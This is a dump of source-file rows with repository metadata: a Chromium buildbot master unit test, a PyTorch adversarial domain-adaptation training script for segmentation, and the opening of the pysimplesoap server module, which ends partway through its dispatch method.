Dataset schema (one row per source file):

hexsha: string (length 40) | size: int64 (4 to 1.02M) | ext: string (8 classes) | lang: string (1 class)
max_stars_repo_path: string (4 to 209) | max_stars_repo_name: string (5 to 121) | max_stars_repo_head_hexsha: string (40) | max_stars_repo_licenses: list (1 to 10) | max_stars_count: int64 (1 to 191k, nullable) | max_stars_repo_stars_event_min_datetime: string (24, nullable) | max_stars_repo_stars_event_max_datetime: string (24, nullable)
max_issues_repo_path: string (4 to 209) | max_issues_repo_name: string (5 to 121) | max_issues_repo_head_hexsha: string (40) | max_issues_repo_licenses: list (1 to 10) | max_issues_count: int64 (1 to 67k, nullable) | max_issues_repo_issues_event_min_datetime: string (24, nullable) | max_issues_repo_issues_event_max_datetime: string (24, nullable)
max_forks_repo_path: string (4 to 209) | max_forks_repo_name: string (5 to 121) | max_forks_repo_head_hexsha: string (40) | max_forks_repo_licenses: list (1 to 10) | max_forks_count: int64 (1 to 105k, nullable) | max_forks_repo_forks_event_min_datetime: string (24, nullable) | max_forks_repo_forks_event_max_datetime: string (24, nullable)
content: string (4 to 1.02M) | avg_line_length: float64 (1.07 to 66.1k) | max_line_length: int64 (4 to 266k) | alphanum_fraction: float64 (0.01 to 1)
hexsha: 8eb604ab527630f6782f71fc57175248b93e85b4 | size: 8,019 | ext: py | lang: Python
max_stars:  repo_path=infra/libs/buildbot/test/master_test.py | repo_name=asdfghjjklllllaaa/infra | head_hexsha=8f63af54e46194cd29291813f2790ff6e986804d | licenses=["BSD-3-Clause"] | count=1 | event_min=2020-11-11T06:25:13.000Z | event_max=2020-11-11T06:25:13.000Z
max_issues: repo_path=infra/libs/buildbot/test/master_test.py | repo_name=mcgreevy/chromium-infra | head_hexsha=09064105713603f7bf75c772e8354800a1bfa256 | licenses=["BSD-3-Clause"] | count=21 | event_min=2020-09-06T02:41:05.000Z | event_max=2022-03-02T04:40:01.000Z
max_forks:  repo_path=infra/libs/buildbot/test/master_test.py | repo_name=asdfghjjklllllaaa/infra | head_hexsha=8f63af54e46194cd29291813f2790ff6e986804d | licenses=["BSD-3-Clause"] | count=null | event_min=null | event_max=null
content:
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import json
import os
import requests
import simplejson
import subprocess
from infra.libs.buildbot import master
from testing_support import auto_stub
DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')
class TestMasterInformation(auto_stub.TestCase):
def setUp(self):
super(TestMasterInformation, self).setUp()
self.calls = []
self.master_data = [{
'alt_port': 8211,
'buildbot_url': 'http://build.chromium.org/p/chromium.fyi/',
'dirname': 'master.chromium.fyi',
'fullhost': 'master1.golo.chromium.org',
'host': 'master1.golo',
'internal': False,
'name': 'ChromiumFYI',
'port': 8011,
'slave_port': 8111
}]
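# The tests below never shell out: subprocess.check_output is replaced with a
# stub that records its arguments and returns the mastermap entry above as
# JSON, and individual tests swap requests.get for self.requests_handler, which
# simply returns the canned self.res response.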
def _handle_check_output(*args):
self.calls.append(args[0])
return json.dumps(self.master_data)
self.mock(subprocess, 'check_output', _handle_check_output)
self.chromium_fyi = os.path.join(DATA_DIR, 'master.chromium.fyi')
self.chromium_webkit = os.path.join(DATA_DIR, 'master.chromium.webkit')
self.chromium_linux = os.path.join(DATA_DIR, 'master.chromium.linux')
self.supersecret = os.path.join(
DATA_DIR, 'build_internal', 'masters', 'master.chromium.supersecret')
self.Response = collections.namedtuple('Response', ['status_code', 'json'])
self.res = None
self.requests_handler = lambda *_args, **_kwargs: self.res
def testPidIsRunning(self):
self.mock(master, '_pid_is_alive', lambda _x: True)
self.assertTrue(master.buildbot_is_running(self.chromium_fyi))
def testPidIsNotRunning(self):
self.mock(master, '_pid_is_alive', lambda _x: False)
self.assertFalse(master.buildbot_is_running(self.chromium_fyi))
def testPidfileNotThere(self):
# _pid_is_alive should not be called here and it is an error if it is.
# pylint: disable=redundant-unittest-assert
self.mock(
master, '_pid_is_alive',
lambda _x: self.assertTrue(False)) # pragma: no cover
# There is no twistd.pid in chromium.webkit.
self.assertFalse(master.buildbot_is_running(self.chromium_webkit))
def testNoActionsLog(self):
last_boot = master.get_last_boot(self.chromium_webkit)
self.assertIsNone(last_boot)
def testGetLastBoot(self):
last_boot = master.get_last_boot(self.chromium_fyi)
# Apr 23 2015 11:01:40 PDT.
self.assertEqual(last_boot, 1429812100)
def testGetLastNoNewBuilds(self):
last_no_new_builds = master.get_last_no_new_builds(self.chromium_fyi)
# Apr 23 2015 11:01:50 PDT.
self.assertEqual(last_no_new_builds, 1429812110)
def testGetLastNoNewBuildsNotThere(self):
last_no_new_builds = master.get_last_no_new_builds(self.chromium_webkit)
self.assertIsNone(last_no_new_builds)
def testGetLastNoNewBuildsButStarted(self):
last_no_new_builds = master.get_last_no_new_builds(self.chromium_linux)
self.assertIsNone(last_no_new_builds)
def testGetLastBootNotThere(self):
# 'make wait' is not in the sample actions.log.
last_make_wait = master._get_last_action(self.chromium_fyi, 'make wait')
self.assertIsNone(last_make_wait)
def testMasterWebPort(self):
master_port = master._get_master_web_port(self.chromium_fyi)
self.assertEquals(master_port, 8011)
self.assertEquals(len(self.calls), 1)
# no cover due to a bug in coverage (http://stackoverflow.com/a/35325514)
self.assertTrue(any(x.endswith('mastermap.py')
for x in self.calls[0])) # pragma: no cover
def testNoSuchMaster(self):
master_port = master._get_master_web_port(self.chromium_webkit)
self.assertIsNone(master_port)
def testMasterMapInternal(self):
master._get_master_web_port(self.supersecret)
self.assertEquals(len(self.calls), 1)
# no cover due to a bug in coverage (http://stackoverflow.com/a/35325514)
self.assertTrue(any(x.endswith('mastermap_internal.py')
for x in self.calls[0])) # pragma: no cover
def testGetBuildstate(self):
self.mock(requests, 'get', self.requests_handler)
self.res = self.Response(
status_code=200,
json=lambda: {
'accepting_builds': True,
'builders': {
'test': {
'current_builds': 3,
},
'other': {
'current_builds': 1,
},
'empty': {},
},
})
accepting_builds, running_builds = master.get_varz(self.chromium_fyi)
self.assertTrue(accepting_builds)
self.assertEqual(running_builds, {'test': 3, 'other': 1})
def testNotAcceptingBuilds(self):
self.mock(requests, 'get', self.requests_handler)
self.res = self.Response(
status_code=200,
json=lambda: {'accepting_builds': False})
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertFalse(accepting_builds)
def testAcceptingBuildsNoMaster(self):
accepting_builds, _ = master.get_varz(self.chromium_webkit)
self.assertIsNone(accepting_builds)
def testBadStatusCode(self):
# We shouldn't get to the JSON function since we hit 404.
# pylint: disable=redundant-unittest-assert
self.res = self.Response(
status_code=404,
json=lambda: self.assertTrue(False)) # pragma: no cover
self.mock(requests, 'get', self.requests_handler)
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertFalse(accepting_builds)
def testBadJson(self):
def raiser():
raise simplejson.scanner.JSONDecodeError('bad json', '', 0)
self.res = self.Response(
status_code=200,
json=raiser)
self.mock(requests, 'get', self.requests_handler)
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertFalse(accepting_builds)
def testTimeout(self):
def timeout(*_args, **_kwargs):
raise requests.exceptions.Timeout('timeout')
self.mock(requests, 'get', timeout)
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertIsNone(accepting_builds)
def testConnectionErr(self):
def timeout(*_args, **_kwargs):
raise requests.exceptions.ConnectionError('error')
self.mock(requests, 'get', timeout)
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertIsNone(accepting_builds)
def testMastermapHost(self):
masters = [
{'fullhost': 'bananas.cool'},
{'fullhost': 'bananas.cool'},
{'fullhost': 'bananas_dos.cool'},
]
self.mock(master, '_call_mastermap', lambda _x: masters)
self.assertEqual(
len(master.get_mastermap_for_host('fake', 'bananas.cool')),
2)
class TestMasterManipulation(auto_stub.TestCase):
def setUp(self):
super(TestMasterManipulation, self).setUp()
self.chromium_fyi = os.path.join(DATA_DIR, 'master.chromium.fyi')
def DISABLED_testWithGclientSyncEnabled(self): # pragma: no cover
actions = list(master.convert_action_items_to_cli((
master.GclientSync,
master.MakeStop,
master.MakeWait,
master.MakeStart,
master.MakeNoNewBuilds),
self.chromium_fyi,
enable_gclient=True))
self.assertEquals(
[a['cmd'] for a in actions],
[
['gclient', 'sync', '--reset', '--force', '--auto_rebase'],
['make', 'stop'],
['make', 'wait'],
['make', 'start'],
['make', 'no-new-builds'],
],
)
def testWithGclientSyncDisabled(self):
actions = list(master.convert_action_items_to_cli((
master.GclientSync,
master.MakeStop),
self.chromium_fyi))
self.assertEquals(
[a['cmd'] for a in actions],
[
['make', 'stop'],
],
)
def testInvalid(self):
with self.assertRaises(ValueError):
list(master.convert_action_items_to_cli((-100,), self.chromium_fyi))
avg_line_length: 34.123404 | max_line_length: 79 | alphanum_fraction: 0.681506

hexsha: ce66bb511d631a73acfb8472fe0a47fb976e50eb | size: 14,835 | ext: py | lang: Python
max_stars:  repo_path=scripts/train_fcn_adda.py | repo_name=Luodian/MADAN | head_hexsha=7a2918da44f5203b72652bc4cba0e70057482114 | licenses=["MIT"] | count=150 | event_min=2019-10-29T01:22:31.000Z | event_max=2022-02-16T02:09:31.000Z
max_issues: repo_path=scripts/train_fcn_adda.py | repo_name=pikachusocute/MADAN | head_hexsha=7a2918da44f5203b72652bc4cba0e70057482114 | licenses=["MIT"] | count=6 | event_min=2020-01-05T16:56:51.000Z | event_max=2021-10-13T03:25:05.000Z
max_forks:  repo_path=scripts/train_fcn_adda.py | repo_name=pikachusocute/MADAN | head_hexsha=7a2918da44f5203b72652bc4cba0e70057482114 | licenses=["MIT"] | count=23 | event_min=2019-11-04T15:46:29.000Z | event_max=2022-01-16T09:10:01.000Z
content:
import logging
import os
import os.path
import sys
from collections import deque
from datetime import datetime
import click
import numpy as np
import torch
import torch.nn.functional as F
from tensorboardX import SummaryWriter
from torch.autograd import Variable
sys.path.append('/nfs/project/libo_iMADAN')
from cycada.data.adda_datasets import AddaDataLoader
from cycada.models import get_model
from cycada.models.models import models
from cycada.models import Discriminator
from cycada.util import config_logging
from cycada.tools.util import make_variable, mmd_loss
def check_label(label, num_cls):
"Check that no labels are out of range"
label_classes = np.unique(label.numpy().flatten())
label_classes = label_classes[label_classes < 255]
if len(label_classes) == 0:
print('All ignore labels')
return False
class_too_large = label_classes.max() > num_cls
if class_too_large or label_classes.min() < 0:
print('Labels out of bound')
print(label_classes)
return False
return True
def forward_pass(net, discriminator, im, requires_grad=False, discrim_feat=False):
if discrim_feat:
score, feat = net(im)
dis_score = discriminator(feat)
else:
score = net(im)
dis_score = discriminator(score)
if not requires_grad:
score = Variable(score.data, requires_grad=False)
return score, dis_score
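# supervised_loss: NLLLoss on log-softmax scores is per-pixel cross-entropy;
# label value 255 marks ignored (void) pixels.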
def supervised_loss(score, label, weights=None):
loss_fn_ = torch.nn.NLLLoss(weight=weights, reduction='mean', ignore_index=255)
loss = loss_fn_(F.log_softmax(score, dim=1), label)
return loss
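# discriminator_loss: least-squares GAN loss when lsgan=True, otherwise
# cross-entropy against a constant per-pixel domain label (target_val).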
def discriminator_loss(score, target_val, lsgan=False):
if lsgan:
loss = 0.5 * torch.mean((score - target_val) ** 2)
else:
_, _, h, w = score.size()
target_val_vec = Variable(target_val * torch.ones(1, h, w), requires_grad=False).long().cuda()
loss = supervised_loss(score, target_val_vec)
return loss
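# fast_hist builds a num_cls x num_cls confusion matrix by encoding each valid
# pixel as n * true_label + prediction and counting with np.bincount;
# seg_accuracy then reads per-class intersections/unions and overall pixel
# accuracy off that matrix.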
def fast_hist(a, b, n):
k = (a >= 0) & (a < n)
return np.bincount(n * a[k].astype(int) + b[k], minlength=n ** 2).reshape(n, n)
def seg_accuracy(score, label, num_cls):
_, preds = torch.max(score.data, 1)
hist = fast_hist(label.cpu().numpy().flatten(),
preds.cpu().numpy().flatten(), num_cls)
intersections = np.diag(hist)
unions = (hist.sum(1) + hist.sum(0) - np.diag(hist) + 1e-8) * 100
acc = np.diag(hist).sum() / hist.sum()
return intersections, unions, acc
@click.command()
@click.argument('output')
@click.option('--dataset', required=True, multiple=True)
@click.option('--datadir', default="", type=click.Path(exists=True))
@click.option('--lr', '-l', default=0.0001)
@click.option('--momentum', '-m', default=0.9)
@click.option('--batch', default=1)
@click.option('--snapshot', '-s', default=5000)
@click.option('--downscale', type=int)
@click.option('--resize', default=None, type=int)
@click.option('--crop_size', default=None, type=int)
@click.option('--half_crop', default=None)
@click.option('--cls_weights', type=click.Path(exists=True))
@click.option('--weights_discrim', type=click.Path(exists=True))
@click.option('--weights_init', type=click.Path(exists=True))
@click.option('--model', default='fcn8s', type=click.Choice(models.keys()))
@click.option('--lsgan/--no_lsgan', default=False)
@click.option('--num_cls', type=int, default=19)
@click.option('--gpu', default='0')
@click.option('--max_iter', default=10000)
@click.option('--lambda_d', default=1.0)
@click.option('--lambda_g', default=1.0)
@click.option('--train_discrim_only', default=False)
@click.option('--with_mmd_loss/--no_mmd_loss', default=False)
@click.option('--discrim_feat/--discrim_score', default=False)
@click.option('--weights_shared/--weights_unshared', default=False)
@click.option('--data_flag', type=str, default=None)
@click.option('--small', type=int, default=2)
def main(output, dataset, datadir, lr, momentum, snapshot, downscale, cls_weights, gpu,
weights_init, num_cls, lsgan, max_iter, lambda_d, lambda_g,
train_discrim_only, weights_discrim, crop_size, weights_shared,
discrim_feat, half_crop, batch, model, data_flag, resize, with_mmd_loss, small):
# Seed the RNGs so data is sampled in a consistent way
np.random.seed(1336)
torch.manual_seed(1336)
logdir = 'runs/{:s}/{:s}_to_{:s}/lr{:.1g}_ld{:.2g}_lg{:.2g}'.format(model, dataset[0],
dataset[1], lr, lambda_d, lambda_g)
if weights_shared:
logdir += '_weights_shared'
else:
logdir += '_weights_unshared'
if discrim_feat:
logdir += '_discrim_feat'
else:
logdir += '_discrim_score'
logdir += '/' + datetime.now().strftime('%Y_%b_%d-%H:%M')
writer = SummaryWriter(log_dir=logdir)
os.environ['CUDA_VISIBLE_DEVICES'] = gpu
config_logging()
print('Train Discrim Only', train_discrim_only)
if model == 'fcn8s':
net = get_model(model, num_cls=num_cls, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat)
else:
net = get_model(model, num_cls=num_cls, finetune=True, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat)
net.cuda()
str_ids = gpu.split(',')
gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
gpu_ids.append(id)
# set gpu ids
if len(gpu_ids) > 0:
torch.cuda.set_device(gpu_ids[0])
assert (torch.cuda.is_available())
net.to(gpu_ids[0])
net = torch.nn.DataParallel(net, gpu_ids)
if weights_shared:
net_src = net # shared weights
else:
net_src = get_model(model, num_cls=num_cls, finetune=True, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat)
net_src.eval()
# initialize Discrminator
odim = 1 if lsgan else 2
idim = num_cls if not discrim_feat else 4096
print('Discrim_feat', discrim_feat, idim)
print('Discriminator init weights: ', weights_discrim)
discriminator = Discriminator(input_dim=idim, output_dim=odim,
pretrained=not (weights_discrim == None),
weights_init=weights_discrim).cuda()
discriminator.to(gpu_ids[0])
discriminator = torch.nn.DataParallel(discriminator, gpu_ids)
loader = AddaDataLoader(net.module.transform, dataset, datadir, downscale, resize=resize,
crop_size=crop_size, half_crop=half_crop, batch_size=batch,
shuffle=True, num_workers=16, src_data_flag=data_flag, small=small)
print('dataset', dataset)
# Class weighted loss?
if cls_weights is not None:
weights = np.loadtxt(cls_weights)
else:
weights = None
# setup optimizers
opt_dis = torch.optim.SGD(discriminator.module.parameters(), lr=lr,
momentum=momentum, weight_decay=0.0005)
opt_rep = torch.optim.SGD(net.module.parameters(), lr=lr,
momentum=momentum, weight_decay=0.0005)
iteration = 0
num_update_g = 0
last_update_g = -1
losses_super_s = deque(maxlen=100)
losses_super_t = deque(maxlen=100)
losses_dis = deque(maxlen=100)
losses_rep = deque(maxlen=100)
accuracies_dom = deque(maxlen=100)
intersections = np.zeros([100, num_cls])
iu_deque = deque(maxlen=100)
unions = np.zeros([100, num_cls])
accuracy = deque(maxlen=100)
print('Max Iter:', max_iter)
net.train()
discriminator.train()
loader.loader_src.dataset.__getitem__(0, debug=True)
loader.loader_tgt.dataset.__getitem__(0, debug=True)
while iteration < max_iter:
for im_s, im_t, label_s, label_t in loader:
if iteration == 0:
print("IM S: {}".format(im_s.size()))
print("Label S: {}".format(label_s.size()))
print("IM T: {}".format(im_t.size()))
print("Label T: {}".format(label_t.size()))
if iteration > max_iter:
break
info_str = 'Iteration {}: '.format(iteration)
if not check_label(label_s, num_cls):
continue
###########################
# 1. Setup Data Variables #
###########################
im_s = make_variable(im_s, requires_grad=False)
label_s = make_variable(label_s, requires_grad=False)
im_t = make_variable(im_t, requires_grad=False)
label_t = make_variable(label_t, requires_grad=False)
#############################
# 2. Optimize Discriminator #
#############################
# zero gradients for optimizer
opt_dis.zero_grad()
opt_rep.zero_grad()
# extract features
if discrim_feat:
score_s, feat_s = net_src(im_s)
score_s = Variable(score_s.data, requires_grad=False)
f_s = Variable(feat_s.data, requires_grad=False)
else:
score_s = Variable(net_src(im_s).data, requires_grad=False)
f_s = score_s
dis_score_s = discriminator(f_s)
if discrim_feat:
score_t, feat_t = net(im_t)
score_t = Variable(score_t.data, requires_grad=False)
f_t = Variable(feat_t.data, requires_grad=False)
else:
score_t = Variable(net(im_t).data, requires_grad=False)
f_t = score_t
dis_score_t = discriminator(f_t)
dis_pred_concat = torch.cat((dis_score_s, dis_score_t))
# prepare real and fake labels
batch_t, _, h, w = dis_score_t.size()
batch_s, _, _, _ = dis_score_s.size()
dis_label_concat = make_variable(
torch.cat(
[torch.ones(batch_s, h, w).long(),
torch.zeros(batch_t, h, w).long()]
), requires_grad=False)
# compute loss for discriminator
loss_dis = supervised_loss(dis_pred_concat, dis_label_concat)
(lambda_d * loss_dis).backward()
losses_dis.append(loss_dis.item())
# optimize discriminator
opt_dis.step()
# compute discriminator acc
pred_dis = torch.squeeze(dis_pred_concat.max(1)[1])
dom_acc = (pred_dis == dis_label_concat).float().mean().item()
accuracies_dom.append(dom_acc * 100.)
# add discriminator info to log
info_str += " domacc:{:0.1f} D:{:.3f}".format(np.mean(accuracies_dom),
np.mean(losses_dis))
writer.add_scalar('loss/discriminator', np.mean(losses_dis), iteration)
writer.add_scalar('acc/discriminator', np.mean(accuracies_dom), iteration)
###########################
# Optimize Target Network #
###########################
dom_acc_thresh = 60
if train_discrim_only and np.mean(accuracies_dom) > dom_acc_thresh:
os.makedirs(output, exist_ok=True)
torch.save(discriminator.module.state_dict(),
'{}/discriminator_abv60.pth'.format(output, iteration))
break
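# Adversarial update of the segmentation net: it only runs once the
# discriminator is doing well (domain accuracy above dom_acc_thresh), and it
# pushes target-domain features toward the "source" label (ones) so the
# discriminator can no longer separate the two domains.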
if not train_discrim_only and np.mean(accuracies_dom) > dom_acc_thresh:
last_update_g = iteration
num_update_g += 1
if num_update_g % 1 == 0:
print('Updating G with adversarial loss ({:d} times)'.format(num_update_g))
# zero out optimizer gradients
opt_dis.zero_grad()
opt_rep.zero_grad()
# extract features
if discrim_feat:
score_t, feat_t = net(im_t)
score_t = Variable(score_t.data, requires_grad=False)
f_t = feat_t
else:
score_t = net(im_t)
f_t = score_t
# score_t = net(im_t)
dis_score_t = discriminator(f_t)
# create fake label
batch, _, h, w = dis_score_t.size()
target_dom_fake_t = make_variable(torch.ones(batch, h, w).long(),
requires_grad=False)
# compute loss for target net
loss_gan_t = supervised_loss(dis_score_t, target_dom_fake_t)
(lambda_g * loss_gan_t).backward()
losses_rep.append(loss_gan_t.item())
writer.add_scalar('loss/generator', np.mean(losses_rep), iteration)
# optimize target net
opt_rep.step()
# log net update info
info_str += ' G:{:.3f}'.format(np.mean(losses_rep))
if (not train_discrim_only) and weights_shared and np.mean(accuracies_dom) > dom_acc_thresh:
print('Updating G using source supervised loss.')
# zero out optimizer gradients
opt_dis.zero_grad()
opt_rep.zero_grad()
# extract features
if discrim_feat:
score_s, feat_s = net(im_s)
else:
score_s = net(im_s)
loss_supervised_s = supervised_loss(score_s, label_s, weights=weights)
if with_mmd_loss:
print("Updating G using discrepancy loss")
lambda_discrepancy = 0.1
loss_mmd = mmd_loss(feat_s, feat_t) * 0.5 + mmd_loss(score_s, score_t) * 0.5
loss_supervised_s += lambda_discrepancy * loss_mmd
loss_supervised_s.backward()
losses_super_s.append(loss_supervised_s.item())
info_str += ' clsS:{:.2f}'.format(np.mean(losses_super_s))
writer.add_scalar('loss/supervised/source', np.mean(losses_super_s), iteration)
# optimize target net
opt_rep.step()
# compute supervised loss for the target domain -- monitoring only, no backward()
loss_supervised_t = supervised_loss(score_t, label_t, weights=weights)
losses_super_t.append(loss_supervised_t.item())
info_str += ' clsT:{:.2f}'.format(np.mean(losses_super_t))
writer.add_scalar('loss/supervised/target', np.mean(losses_super_t), iteration)
###########################
# Log and compute metrics #
###########################
if iteration % 10 == 0 and iteration > 0:
# compute metrics
intersection, union, acc = seg_accuracy(score_t, label_t.data, num_cls)
intersections = np.vstack([intersections[1:, :], intersection[np.newaxis, :]])
unions = np.vstack([unions[1:, :], union[np.newaxis, :]])
accuracy.append(acc.item() * 100)
acc = np.mean(accuracy)
mIoU = np.mean(np.maximum(intersections, 1) / np.maximum(unions, 1)) * 100
iu = (intersection / union) * 10000
iu_deque.append(np.nanmean(iu))
info_str += ' acc:{:0.2f} mIoU:{:0.2f}'.format(acc, np.mean(iu_deque))
writer.add_scalar('metrics/acc', np.mean(accuracy), iteration)
writer.add_scalar('metrics/mIoU', np.mean(mIoU), iteration)
logging.info(info_str)
iteration += 1
################
# Save outputs #
################
# every 500 iters save current model
if iteration % 500 == 0:
os.makedirs(output, exist_ok=True)
if not train_discrim_only:
torch.save(net.module.state_dict(),
'{}/net-itercurr.pth'.format(output))
torch.save(discriminator.module.state_dict(),
'{}/discriminator-itercurr.pth'.format(output))
# save labeled snapshots
if iteration % snapshot == 0:
os.makedirs(output, exist_ok=True)
if not train_discrim_only:
torch.save(net.module.state_dict(),
'{}/net-iter{}.pth'.format(output, iteration))
torch.save(discriminator.module.state_dict(),
'{}/discriminator-iter{}.pth'.format(output, iteration))
if iteration - last_update_g >= 3 * len(loader):
print('No suitable discriminator found -- returning.')
torch.save(net.module.state_dict(),
'{}/net-iter{}.pth'.format(output, iteration))
iteration = max_iter # make sure outside loop breaks
break
writer.close()
if __name__ == '__main__':
main()
avg_line_length: 33.947368 | max_line_length: 133 | alphanum_fraction: 0.670442

hexsha: db81e31298f08579b22bb87e588bb0ef1ac23df3 | size: 25,405 | ext: py | lang: Python
max_stars:  repo_path=tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py | repo_name=ls-2018/tips | head_hexsha=1f5f5195d7181b5dd4616db02166f7f92c97f1cd | licenses=["MIT"] | count=2 | event_min=2019-05-07T03:08:25.000Z | event_max=2020-05-22T10:10:00.000Z
max_issues: repo_path=tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py | repo_name=ls-2018/tips | head_hexsha=1f5f5195d7181b5dd4616db02166f7f92c97f1cd | licenses=["MIT"] | count=7 | event_min=2020-05-22T13:29:42.000Z | event_max=2021-09-23T23:30:25.000Z
max_forks:  repo_path=tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py | repo_name=ls-2018/py | head_hexsha=1f5f5195d7181b5dd4616db02166f7f92c97f1cd | licenses=["MIT"] | count=null | event_min=null | event_max=null
content:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 3, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
"""Pythonic simple SOAP Server implementation"""
from __future__ import unicode_literals
import sys
if sys.version_info[0] < 3:
is_py2 = True
else:
is_py2 = False
unicode = str
import datetime
import sys
import logging
import warnings
import re
import traceback
try:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
except ImportError:
from http.server import BaseHTTPRequestHandler, HTTPServer
from . import __author__, __copyright__, __license__, __version__
from .simplexml import SimpleXMLElement, TYPE_MAP, Date, Decimal
log = logging.getLogger(__name__)
# Deprecated?
NS_RX = re.compile(r'xmlns:(\w+)="(.+?)"')
class SoapFault(Exception):
def __init__(self, faultcode=None, faultstring=None, detail=None):
self.faultcode = faultcode or self.__class__.__name__
self.faultstring = faultstring or ''
self.detail = detail
class SoapDispatcher(object):
"""Simple Dispatcher for SOAP Server"""
def __init__(self, name, documentation='', action='', location='',
namespace=None, prefix=False,
soap_uri="http://schemas.xmlsoap.org/soap/envelope/",
soap_ns='soap',
namespaces={},
pretty=False,
debug=False,
**kwargs):
"""
:param namespace: Target namespace; xmlns=targetNamespace
:param prefix: Prefix for target namespace; xmlns:prefix=targetNamespace
:param namespaces: Specify additional namespaces; example: {'external': 'http://external.mt.moboperator'}
:param pretty: Prettifies generated xmls
:param debug: Use to add tracebacks in generated xmls.
Multiple namespaces
===================
It is possible to support multiple namespaces.
You need to specify additional namespaces by passing `namespace` parameter.
>>> dispatcher = SoapDispatcher(
... name = "MTClientWS",
... location = "http://localhost:8008/ws/MTClientWS",
... action = 'http://localhost:8008/ws/MTClientWS', # SOAPAction
... namespace = "http://external.mt.moboperator", prefix="external",
... documentation = 'moboperator MTClientWS',
... namespaces = {
... 'external': 'http://external.mt.moboperator',
... 'model': 'http://model.common.mt.moboperator'
... },
... ns = True)
Now the registered method must return node names with namespaces' prefixes.
>>> def _multi_ns_func(self, serviceMsisdn):
... ret = {
... 'external:activateSubscriptionsReturn': [
... {'model:code': '0'},
... {'model:description': 'desc'},
... ]}
... return ret
Our prefixes will be changed to those used by the client.
"""
self.methods = {}
self.name = name
self.documentation = documentation
self.action = action # base SoapAction
self.location = location
self.namespace = namespace # targetNamespace
self.prefix = prefix
self.soap_ns = soap_ns
self.soap_uri = soap_uri
self.namespaces = namespaces
self.pretty = pretty
self.debug = debug
@staticmethod
def _extra_namespaces(xml, ns):
"""Extends xml with extra namespaces.
:param ns: dict with namespaceUrl:prefix pairs
:param xml: XML node to modify
"""
if ns:
_tpl = 'xmlns:%s="%s"'
_ns_str = " ".join([_tpl % (prefix, uri) for uri, prefix in ns.items() if uri not in xml])
xml = xml.replace('/>', ' ' + _ns_str + '/>')
return xml
def register_function(self, name, fn, returns=None, args=None, doc=None, response_element_name=None):
self.methods[name] = fn, returns, args, doc or getattr(fn, "__doc__",
""), response_element_name or '%sResponse' % name
def response_element_name(self, method):
return self.methods[method][4]
def dispatch(self, xml, action=None, fault=None):
"""Receive and process SOAP call, returns the xml"""
# a dict can be sent in fault to expose it to the caller
# default values:
prefix = self.prefix
ret = None
if fault is None:
fault = {}
soap_ns, soap_uri = self.soap_ns, self.soap_uri
soap_fault_code = 'VersionMismatch'
name = None
# namespaces = [('model', 'http://model.common.mt.moboperator'), ('external', 'http://external.mt.moboperator')]
_ns_reversed = dict(((v, k) for k, v in self.namespaces.items())) # Switch keys-values
# _ns_reversed = {'http://external.mt.moboperator': 'external', 'http://model.common.mt.moboperator': 'model'}
try:
request = SimpleXMLElement(xml, namespace=self.namespace)
# detect soap prefix and uri (xmlns attributes of Envelope)
for k, v in request[:]:
if v in ("http://schemas.xmlsoap.org/soap/envelope/",
"http://www.w3.org/2003/05/soap-env",
"http://www.w3.org/2003/05/soap-envelope",):
soap_ns = request.attributes()[k].localName
soap_uri = request.attributes()[k].value
# If the value from attributes on Envelope is in additional namespaces
elif v in self.namespaces.values():
_ns = request.attributes()[k].localName
_uri = request.attributes()[k].value
_ns_reversed[_uri] = _ns # update with received alias
# Now we change 'external' and 'model' to the received forms i.e. 'ext' and 'mod'
# After that we know how the client has prefixed additional namespaces
decoded_xml = xml if is_py2 else xml.decode('utf8')
ns = NS_RX.findall(decoded_xml)
for k, v in ns:
if v in self.namespaces.values():
_ns_reversed[v] = k
soap_fault_code = 'Client'
# parse request message and get local method
method = request('Body', ns=soap_uri).children()(0)
if action:
# method name = action
name = action[len(self.action) + 1:-1]
prefix = self.prefix
if not action or not name:
# method name = input message name
name = method.get_local_name()
prefix = method.get_prefix()
log.debug('dispatch method: %s', name)
function, returns_types, args_types, doc, response_element_name = self.methods[name]
log.debug('returns_types %s', returns_types)
# de-serialize parameters (if type definitions given)
if args_types:
args = method.children().unmarshall(args_types)
elif args_types is None:
args = {'request': method} # send raw request
else:
args = {} # no parameters
soap_fault_code = 'Server'
# execute function
ret = function(**args)
log.debug('dispatched method returns: %s', ret)
except SoapFault as e:
fault.update({
'faultcode': "%s.%s" % (soap_fault_code, e.faultcode),
'faultstring': e.faultstring,
'detail': e.detail
})
except Exception: # This shouldn't be one huge try/except
import sys
etype, evalue, etb = sys.exc_info()
log.error(traceback.format_exc())
if self.debug:
detail = u''.join(traceback.format_exception(etype, evalue, etb))
detail += u'\n\nXML REQUEST\n\n' + xml.decode('UTF-8')
else:
detail = None
fault.update({'faultcode': "%s.%s" % (soap_fault_code, etype.__name__),
'faultstring': evalue,
'detail': detail})
# build response message
if not prefix:
xml = """<%(soap_ns)s:Envelope xmlns:%(soap_ns)s="%(soap_uri)s"/>"""
else:
xml = """<%(soap_ns)s:Envelope xmlns:%(soap_ns)s="%(soap_uri)s"
xmlns:%(prefix)s="%(namespace)s"/>"""
xml %= { # a %= {} is a shortcut for a = a % {}
'namespace': self.namespace,
'prefix': prefix,
'soap_ns': soap_ns,
'soap_uri': soap_uri
}
# Now we add extra namespaces
xml = SoapDispatcher._extra_namespaces(xml, _ns_reversed)
# Change our namespace alias to that given by the client.
